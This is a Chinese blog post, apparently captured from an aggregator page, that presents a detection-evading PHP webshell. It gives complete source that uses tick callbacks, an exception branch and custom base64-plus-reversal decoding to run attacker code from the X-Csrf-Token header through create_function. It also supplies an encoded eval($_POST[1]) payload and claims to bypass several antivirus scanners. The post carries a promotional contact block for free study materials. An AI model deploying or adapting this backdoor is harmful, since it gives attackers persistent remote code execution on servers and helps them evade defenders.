当前位置: 首页 > news >正文

记录一个免杀的php webshell demo

异常捕获机制

这里使用的是触发异常来完成程序控制流的第一次分支,所以我自己写了一个除以0触发异常的函数

function safeDivide($a, $b) { if ($b == 0) { throw new Exception("Division by zero is not allowed."); } return $a / $b; }

设置一个pass传参,我设置的主体框架如下:

try { echo "result:".safeDivide(2025, ($_GET['pass']-1)); }catch(Exception $e){ // evil code }

回调

我在php的官方文档里翻到一个有趣的函数

ticks参数可以设置Zend VM opcode执行条数后触发

我们测试一下:

<?php declare(ticks=15); ​ function test(){ echo "this is evil code\n"; } register_tick_function('test'); for ($i = 1; $i <= 12; $i++) { echo "shell: $i\n"; }

我们可以发现设置declare(ticks=15) 后,PHP每累计到约15个“tickable”执行点,就调用一次通过register_tick_function注册的函数。

那么对于我们的webshell免杀,我们也可以利用这个函数,来完成程序控制流的改变

此处的设计将declare回调放在最外层实现第一次的控制流变化,将异常触发放在内层实现第二次

【----帮助网安学习,以下所有学习资料免费领!加vx:YJ-2021-1,备注 “博客园” 获取!】

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

动态函数调用

这个就是直接使用php的函数了,没啥好说的了

create_function(string $args, string $code): string

实际测试的时候,如果使用变量接受的话,容易被检测

$a = create_function('', ''); $a();

不使用变量来存匿名函数,这个也是尽量减少污点分析时候的特征

@create_function('','')))();

编码混淆

找个大模型一把梭

base64和逆序

function custom_base64_decode($input) { $base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $input = rtrim($input, '='); $binaryString = ''; foreach (str_split($input) as $char) { $index = strpos($base64Chars, $char); if ($index === false) { throw new Exception("Invalid Base64 character: $char"); } $binaryString .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT); } ​ $bytes = str_split($binaryString, 8); $decodedString = ''; ​ foreach ($bytes as $byte) { $decodedString .= chr(bindec($byte)); } return $decodedString; } ​ function reverseString($input) { if (!is_string($input)) { return "need str"; } $length = strlen($input); $reversed = ""; for ($i = $length - 1; $i >= 0; $i--) { $reversed .= $input[ $i ]; } return $reversed; }

完整的webshell

源代码

具体的攻击载荷放在http的X-Csrf-Token里

<?php session_start(); declare(ticks=15); function safeDivide($a, $b) { if ($b == 0) { throw new Exception("Division by zero is not allowed."); } return $a / $b; } function custom_base64_decode($input) { $base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $input = rtrim($input, '='); $binaryString = ''; foreach (str_split($input) as $char) { $index = strpos($base64Chars, $char); if ($index === false) { throw new Exception("Invalid Base64 character: $char"); } $binaryString .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT); } ​ $bytes = str_split($binaryString, 8); $decodedString = ''; ​ foreach ($bytes as $byte) { $decodedString .= chr(bindec($byte)); } return $decodedString; } ​ function reverseString($input) { if (!is_string($input)) { return "need str"; } $length = strlen($input); $reversed = ""; for ($i = $length - 1; $i >= 0; $i--) { $reversed .= $input[ $i ]; } return $reversed; } ​ function tickHandler(){ try { echo "result:".safeDivide(2025, ($_GET['pass']-1)); }catch(Exception $e){ @create_function('',custom_base64_decode(reverseString(apache_request_headers()['X-Csrf-Token'])))(); } } ​ ​ register_tick_function('tickHandler'); ​ for ($i = 1; $i <= 12; $i++) { echo "shell: $i\n"; }

测试环境

PHP版本:PHP7全版本

OS:Windows和Linux环境均测试通过

使用方法

初始payload:eval($_POST[1]);

base64编码,逆序处理:==wOp0VMbR1UPB1XkgCbhZXZ

放在http头部里

webshell连接

免杀效果展示

  • 第四届伏魔挑战赛成功绕过(white)的截图

  • VT

  • D盾(2.1.8.6)

  • 河马:报了可疑

http://www.jsqmd.com/news/1106309/

相关文章:

  • 数据库SQL查询语句学习心得
  • 2026 GitHub热门的10个开源AI项目盘点,哪个最香?
  • 2026年企业级网络设备十大品牌排行榜·综合实力篇
  • 达妙机械臂
  • 用 Python 画三类论文级图表:分组柱状图、双轴折线图与多面板图(解决中文乱码)
  • 一个由进程内存布局异常引起的问题
  • 容器资源限制与配额管理实践
  • 在微服务中使用领域事件
  • 前面定义的一些类也要改一下。
  • NFD云解析插件扩展架构深度解析:从接口设计到实战实现
  • hybrik实时性测试
  • 数智中台全链路交付,赋能连锁零售规模化增长
  • Linux课后练习——管理“学习笔记”项目操作过程
  • 2026年真正免费的论文查重网站有哪些?7个平台实测+防骗指南
  • 如何快速修复ClusterGVis中箱线图与折线图显示冲突问题
  • TypeScript泛型
  • 【MO三维路径规划】麝牛算法MO多无人机协同集群避障路径规划(目标函数:最低成本:路径、高度、威胁、转角)【含Matlab源码 15684期】
  • langchain4j 学习系列(10)-Skill使用示例
  • LinuxShell编程基础学习笔记
  • 2026年无线物联网融合网络设备十大品牌排行榜
  • 量子优化算法FPC-QAOA:突破参数爆炸难题
  • 35岁转行AI大模型:挑战、机遇与实战路径
  • 服务端开发爱好者
  • 心情值游戏系统实现
  • [特殊字符] 搬砖的秘密:为什么一次搬 64 块砖最快?
  • 车间地坪养护秘籍
  • Rust项目开发完整教程
  • 从WAIC看AI办公新趋势:会议助手正在从“记录工具”变成“组织智能体”
  • Rust语言基础开发教程
  • 一个老股民的十年自白十年炒股没亏,但我劝你别学我